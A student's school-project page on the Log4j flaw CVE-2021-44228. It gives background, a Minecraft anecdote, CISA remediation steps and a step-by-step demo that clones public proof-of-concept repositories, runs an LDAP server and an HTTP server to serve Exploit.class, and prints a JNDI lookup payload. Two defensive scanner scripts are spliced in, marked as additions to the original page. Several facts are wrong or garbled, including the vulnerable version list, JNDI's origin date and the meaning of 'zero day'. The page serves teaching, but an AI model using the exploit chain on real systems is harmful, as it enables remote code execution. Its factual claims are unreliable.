WARNING: THIS IS A SCHOOL PROJECT - ALL DEMOS HAVE BEEN PATCHED WITH THE MOST RECENT SERVICES - ALL MACHINES ATTACKED ARE UNDER MY (DSFILAK) FULL AUTHORITY AND OWNERSHIP TO PERFORM ATTACKS. Thanks.

LOG4J - Risk vulnerability - CVE-2021-44228


Log4j is a ZERO DAY ATTACK, which means that the attack could have been prevented if the developers had known about it when developing the JDK. According to CVE-2021-44228 [1], Apache log4j2 2.0-beta through 2.15.0 are the vulnerable versions: they allow an attacker to abuse the Lightweight Directory Access Protocol (LDAP) and the Java Naming and Directory Interface (JNDI) within Java and Apache applications, giving remote code execution in vulnerable software such as Minecraft. This CVE has a base score of 10 CRITICAL, the highest severity, and requires immediate security updates to avoid harm. The attack was possible because of JNDI features in Log4j's configuration and log messages, through which an attacker could deliver remote code via an LDAP server. The log4j-core jar file was found to be one of the main issues, as were the LDAP server parameters that allow lookup messages to be fetched from it. The versions of Apache Log4j listed as vulnerable:[2] 2.0-beta9, 2.3.1, 2.4, 2.12.3, 2.13.0, and 2.17.0. Looking back at the updates, Java 8u_20 is the vulnerable Java package whose JNDI implementation uses an LDAP server that is vulnerable. Five years later, the exploit was discovered, and a few users on Twitter, one by the name of @An0maIous,[3] notified the internet. Log4j was vulnerable on many platforms since 2016; luckily, not many malicious users found the attack before it was patched. To be frank, the vulnerability was a simple mistake made by a developer years ago that only came to fruition in 2021. Every piece of software using Java's Naming and Directory Interface (JNDI) was affected, and its users were recommended to immediately update their code.

Personal Experience with LOG4J

 
Players sent out warnings on a server newspaper about LOG4J.

Playing Minecraft in 2021 (Yes, I still play), I remember seeing the log4j in action as I joined one of the most popular servers (Hypixel) on the day it started to make its way through Minecraft, as people were able to see images through to the text chat, and if a player clicked on the image it would redirect you to a website. Once I saw the attack was being exploited on this big server, I changed to a smaller server that one of my friends owned, and a guy joined and started the exploit, yet this one redirected me to LiveLeak (which I remember quite vividly, as a dude's head was cut off in the first video). Being a curious teenager just going into college, hell yeah I clicked it. Looking back, clicking on the exploit was probably not the smartest idea.

To see a video of someone abusing log4j in Minecraft click here. The video by Redstoner 2b2t shows how log4j was used to take over another user's account and blow up their base. During the video, a newspaper was being used to send out a warning to users logging into the server as they could be exploited.

JNDI & LDAP - Controls

 
JNDI & LDAP DEMO FROM YT VID

What is JNDI?[4] JNDI stands for Java Naming and Directory Interface, which was created back in 2013 with a feature called JNDI lookup that lets the logger resolve lookups in the messages it reads. This is what malicious users used to exploit Minecraft servers: when they sent ${jndi:ldap://0.0.0.0/#Exploit.payload} in chat, the lookup feature read the string from the log, fetched the referenced payload and stored it on the victim's computer, essentially gaining control to perform an RCE on the victim.

What is LDAP?[5] LDAP stands for Lightweight Directory Access Protocol, an application protocol used to send data to and find data in a directory; in this case the directory access came through Minecraft's Log4j files. LDAP is a very common place for data such as passwords and usernames, as the server can be turned off to stop authentication.
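As an added example (not part of the original page or of the proof-of-concept repositories it links), here is a small Python check from the defender's side: it scans log lines for the kind of ${jndi:...} lookup string described above, which is what a server operator or SOC would want to alert on. The log lines are constructed for this example, and the Minecraft-style server log format is an assumption.

```python
import re

# Constructed sample lines in the style of a Minecraft server chat log
# (made up for this example, not captured from any real server).
SAMPLE_LOG_LINES = [
    "[12:01:03] [Server thread/INFO]: <steve> anyone want to trade diamonds?",
    "[12:01:09] [Server thread/INFO]: <alex> ${jndi:ldap://0.0.0.0/#Exploit.payload}",
    "[12:01:15] [Server thread/INFO]: <alex> ${JNDI:LDAP://0.0.0.0:1389/a}",
    "[12:01:20] [Server thread/INFO]: <steve> my home is ${env:HOME} lol",
    "[12:01:25] [Server thread/INFO]: <steve> selling 64 wood for $5",
]

# A Log4j lookup whose prefix is "jndi" (the lookup abused in CVE-2021-44228),
# matched case-insensitively; the URI inside the braces is captured.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.IGNORECASE)
# Any other "${...}" lookup in player-supplied text is still worth a note:
# untrusted input should never reach the logger with lookups unexpanded.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")

def classify_line(line):
    """Return ("jndi", uri), ("lookup", text) or (None, None) for one log line."""
    m = JNDI_LOOKUP.search(line)
    if m:
        return ("jndi", m.group(1).strip())
    m = ANY_LOOKUP.search(line)
    if m:
        return ("lookup", m.group(0))
    return (None, None)

def scan_log(lines):
    """Return (line_number, severity, detail) for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        kind, detail = classify_line(line)
        if kind == "jndi":
            findings.append((number, "HIGH", detail))
        elif kind == "lookup":
            findings.append((number, "LOW", detail))
    return findings

if __name__ == "__main__":
    for number, severity, detail in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {severity}: {detail}")
```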

SERVICES AFFECTED: [6]


Many manufacturers were affected by the CVE-2021-44228 Log4j vulnerability due to the magnitude of Log4j usage. The following services were vulnerable to the Log4j exploit: Apple[7], Steam, Twitter, Tencent, Cloudflare, Amazon, Tesla, Apache Solr, Apache Druid, Ghidra, Ghidra server, Minecraft[8], Blender, Google, LinkedIn and many more.

The Fix


The Cybersecurity and Infrastructure Security Agency (CISA) released the following three steps to prevent the vulnerability:

"1. Enumerate any external facing devices that have log4j installed.

2. Make sure security operations is actioning every single alert on the devices that fall in the category above.

3. Install a web application firewall (WAF) with rules that automatically update."[9]

Any system running Apache Log4j-Core with a version between 2.0-beta9 and 2.14.1 is vulnerable and is advised to update to at least 2.17.1.[10] It is also recommended that you update your JDK to the most recent version to pick up all security patches. This CVE was not a very hard patch, as it was just a simple mistake from a developer who did not realize that a JNDI lookup could be exploited for an RCE.
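As an added example (not from the page, from CISA or from the Log4j project), CISA's first step above can be scripted: this Python scanner walks a directory for log4j-core jars, reads the Implementation-Version from each jar's manifest, and flags versions in the 2.0-beta9 to 2.14.1 range this section states, as well as jars of unreadable version that still ship JndiLookup.class. The jars it scans are constructed stand-ins built in a temporary directory; the manifest key and the log4j-core*.jar filename pattern are assumptions.

```python
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIRST_VULNERABLE, LAST_VULNERABLE = (2, 0, 0), (2, 14, 1)  # range as stated in this section

def parse_version(text):
    """'2.14.1' or '2.0-beta9' -> (major, minor, patch); the beta/rc suffix is ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None

def inspect_jar(path):
    """Return (version, has_jndi_lookup, vulnerable) for one jar file."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace") \
            if "META-INF/MANIFEST.MF" in names else ""
    m = re.search(r"^Implementation-Version:[ \t]*(\S+)", manifest, re.MULTILINE)
    version = m[1] if m else None
    parsed = parse_version(version)
    has_lookup = JNDI_LOOKUP_CLASS in names
    in_range = parsed is not None and FIRST_VULNERABLE <= parsed <= LAST_VULNERABLE
    # No readable version but JndiLookup.class still shipped: treat as vulnerable.
    return (version, has_lookup, in_range or (parsed is None and has_lookup))

def scan_tree(root):
    """Inventory step: yield (path, inspect_jar(path)) for every log4j-core*.jar under root."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                yield path, inspect_jar(path)

def make_fake_jar(path, version, with_lookup=True):
    """Constructed stand-in for a log4j-core jar: a manifest plus an optional class entry."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class

def demo():
    """Scan a temp tree of constructed jars; returns {jar basename: inspect_jar result}."""
    with tempfile.TemporaryDirectory() as tmp:
        make_fake_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1")
        make_fake_jar(os.path.join(tmp, "log4j-core-2.17.1.jar"), "2.17.1")
        make_fake_jar(os.path.join(tmp, "log4j-core-unknown.jar"), "")
        return {os.path.basename(p): r for p, r in scan_tree(tmp)}
```

Call demo() to run it against the constructed jars; point scan_tree() at a real application directory for an actual inventory.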

One thing I wish I had realized before spending hours on Minecraft was that I couldn't load it on the VM, since there was no graphics card it could emulate. I attempted to pass one through but could not find information on how to do it on vSphere.

 
My Log4j Youtube Demo.

The LOG4J Demonstration:[11]


To get started on the demonstration you will need to first get the following:

1. git clone https://github.com/kozmer/log4j-shell-poc

2. git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

 
This screen capture displays the LDAP server and the IP it is listening on.

Kozmer's GitHub repository has the LDAP server, which is easy to run; to get it started you will need to move it into a new directory.

Make sure Tangxiaofeng7's repository is also in the same directory.

Next you will also need Java 1.8_20 for Kozmer's proof of concept. You can download all Java versions here.

1. Unzip the JDK into the same directory as Kozmer's repository: sudo tar -xvzf $file -C $Directory. You can also unzip it first and then move it with mv $file $Directory.

2. Run python3 poc.py in Kozmer's directory.

 
The Python http.server is receiving the request for Exploit.class through your LDAP server.

Your LDAP server is up and running!

Set up a Python HTTP server or a netcat listener to serve Exploit.java, which you can check with curl.

1. python3 -m http.server 1337

To test that the exploit can be sent to you, run curl -I 0.0.0.0:1389 (your LDAP server).

Now for your own fun.

Go into the directory holding the exploit, /CVE-2021-44228-Apache-Log4j-Rce/, and run ls.

Open Exploit.java with your favorite text editor:

sudo nano ~/CVE-2021-44228-Apache-Log4j-Rce/Exploit.java

From there you can edit the new String and exploit Log4j all you want!


Luckily, most of the Log4j applications that were vulnerable have been patched, and the earlier versions carrying the exploit are mostly EOL (end of life). As a result you can no longer run the Log4j vulnerability against them, and all old systems are recommended to update to the latest version of Java and Apache.

References

  1. https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  2. https://logging.apache.org/log4j/2.x/security.html
  3. https://twitter.com/an0maious/status/1469350532548632581
  4. Gordon, Kevin (2021-12-29). "The Anatomy of Log4j JNDI Attack and How to Prevent It". Techblocks. Retrieved 2024-04-29.
  5. "What Is LDAP & How Does It Work? | Okta". www.okta.com. Retrieved 2024-04-29.
  6. https://github.com/YfryTchsGD/Log4jAttackSurface/tree/master/
  7. "About the security content of Xcode 13.3". Apple Support. Retrieved 2024-04-29.
  8. Minecraft (12/10/2021). "Minecraft Log4j Security Update".
  9. "Statement from CISA Director Easterly on "Log4j" Vulnerability | CISA". www.cisa.gov. 2021-12-11. Retrieved 2024-04-29.
  10. "How to Fix the Java Log4j Vulnerability - HBS". www.hbs.net. 2022-10-27. Retrieved 2024-04-29.
  11. https://github.com/kozmer/log4j-shell-poc?tab=readme-ov-file